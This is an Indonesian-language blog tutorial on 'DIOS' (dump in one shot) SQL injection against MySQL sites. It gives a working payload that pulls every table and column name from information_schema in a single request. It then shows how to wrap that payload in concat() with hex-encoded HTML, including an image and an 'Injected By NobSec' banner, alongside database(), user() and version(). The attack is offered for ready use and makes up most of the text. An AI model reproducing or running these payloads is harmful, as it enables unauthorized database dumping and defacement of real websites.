nah buat kalian yang belum tau tentang dios, kalian bisa cari artikel mengenai DIOS di blog ini.
oke dengan adanya dios ini kita jadi tidak perlu repot-repot lagi dump 1 per 1 kan lama :D
dengan adanya Dios ini kalian langsung bisa Mengeluarkan Semua Tabel dan Kolom dalam 1 Dios :p
oke ini dia Diosnya:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Kalian juga bisa memasukan variasi seperti nick name/gambar, lalu bagaimana caranya kalian bisa langsung simak aja tutorialnya di bawah :D
oke disini kita perlu membungkus dios diatas dengan menggunakan
concat()
nah disini kalian bisa menuliskan nick/gambar kalian menggunakan tag HTML dan harus di encode dalam bentuk HEX, disini saya juga akan menambahkan informasi seperti nama database, user, dan juga versi
Ohya untuk tools encodenya saya menggunakan Hackbar
atau kalian bisa juga menggunakan Tools online seperti http://www.convertstring.com/EncodeDecode/HexEncode
contoh 1:
concat(gambar,nick,database,user,versi,DIOS)
contoh 2:
concat(<img src='https://cdn-images-1.medium.com/max/1140/1*jYsvTKZ1Hk_cepClVH3QjQ.png'>,<br>,<h1>Injected By NobSec</h1>,<br>,Database::,database(),<br>,user::,user(),<br>,versi::,versi(),<br>,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
contoh 3:
concat(0x3c696d67207372633d2268747470733a2f2f656e637279707465642d74626e302e677374617469632e636f6d2f696d616765733f713d74626e3a414e6439476354377762465078595a5f4646575a49773273632d396d6a4953596d426b3175615a4876564b4467312d7266322d36786b49775141223e,0x3c62723e,0x3c68313e696e6a6563746564206279204e6f625365633c2f68313e,0x3c62723e,0x44415441424153453a3a,database(),0x3c62723e,0x555345523a3a,user(),0x3c62723e,0x56455253494f4e3a3a,version(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
maka hasilnya akan seperti ini
kalian juga bisa memberi warna pada font dengan menggunakan CSS, dengan begini kalian bisa jadi lebih mudah dalam melakukan Injecting
oke sekian tutorial kali ini sampai bertemu di artikel berikutnya.
0 Komentar